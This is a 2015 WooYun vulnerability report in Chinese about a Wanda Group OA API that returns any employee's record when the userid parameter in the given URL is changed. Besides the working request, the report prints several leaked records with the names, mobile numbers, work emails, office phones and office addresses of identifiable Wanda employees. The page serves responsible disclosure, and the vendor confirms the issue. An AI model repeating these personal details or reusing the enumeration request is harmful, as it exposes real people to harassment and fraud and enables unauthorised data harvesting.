当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140374

漏洞标题:万达OA某API可以遍历所有员工信息(副总和总啥的都有)

相关厂商:大连万达集团股份有限公司

漏洞作者: 逆流冰河

提交时间:2015-09-11 10:39

修复时间:2015-10-26 11:00

公开时间:2015-10-26 11:00

漏洞类型:内部绝密信息泄漏

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-11: 细节已通知厂商并且等待厂商处理中
2015-09-11: 厂商已经确认,细节仅向厂商公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

审核员:http://wooyun.org/bugs/wooyun-2015-0140368
这个是已经审核过了,我现在提的这个审核过的不重复,望仔细审阅

详细说明:

1,直入正题:
URL:http://app.wanda.cn/wanda3v/user/userinfo.html?vid=2a51f71011fc448cb186eb1958b0ec55&sysversion=5.1&devtype=1&appversion=3.0&userid=caodajun
2,最后的userid可以随便修改,以下是我获得的员工资料
第一个:中国首富,不过万达保护的到时挺好的,没看到联系方式
{"data":{"userid": "403850","name": "王健林","apartment": "集团领导","nameid": "","position": "集团董事长","email": "","mobile": "","tel": "","address": "","imageurl": "http://app.wanda.cn/wanda3v/3v/wanda_head/"},"status": 0,"msg": ""}
第二个:万达总裁,不过保护的也很好
{"data":{"userid": "403851","name": "丁本锡","apartment": "集团领导","nameid": "","position": "集团执行董事、总裁兼商业地产、文化集团董事长","email": "","mobile": "","tel": "","address": "","imageurl": "http://app.wanda.cn/wanda3v/3v/wanda_head/"},"status": 0,"msg": ""}
后面的小喽喽就信息比较丰富了
{"data":{"userid": "848281769","name": "曹大军","apartment": "电子商务公司-总经办","nameid": "","position": "电子商务公司首席技术官","email": "","mobile": "15611203032","tel": "010-85713869","address": "","imageurl": "http://app.wanda.cn/wanda3v/3v/wanda_head/"},"status": 0,"msg": ""}
{"data":{"userid": "606631","name": "李涠","apartment": "商管公司-各区域公司-北京区域-北京CBD万达广场-工程部-南区工程部","nameid": "","position": "文员","email": "liwei@wanda.com.cn","mobile": "13651001020","tel": "58208899-2806","address": "北京市朝阳区建国路93号万达广场11号楼2层物业工程部","imageurl": "http://app.wanda.cn/wanda3v/3v/wanda_head/"},"status": 0,"msg": ""}
{"data":{"userid": "459541","name": "王阳","apartment": "万达院线-各区域公司-大连区域-大连高新万达广场店-总经办","nameid": "","position": "影城经理","email": "wangyang@wanda.com.cn","mobile": "15941158076","tel": "0411-39983880","address": "大连高新园区黄浦路506A号万达广场四楼万达影城","imageurl": "http://app.wanda.cn/wanda3v/3v/wanda_head/"},"status": 0,"msg": ""}
好吧,就这样了,我就不一个一个遍历了

漏洞证明:

如上

修复方案:

Fix
高rank

版权声明:转载请注明来源 逆流冰河@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-11 10:59

厂商回复:

感谢逆流冰河同学的关注与贡献!马上通知业务整改!

最新状态:

暂无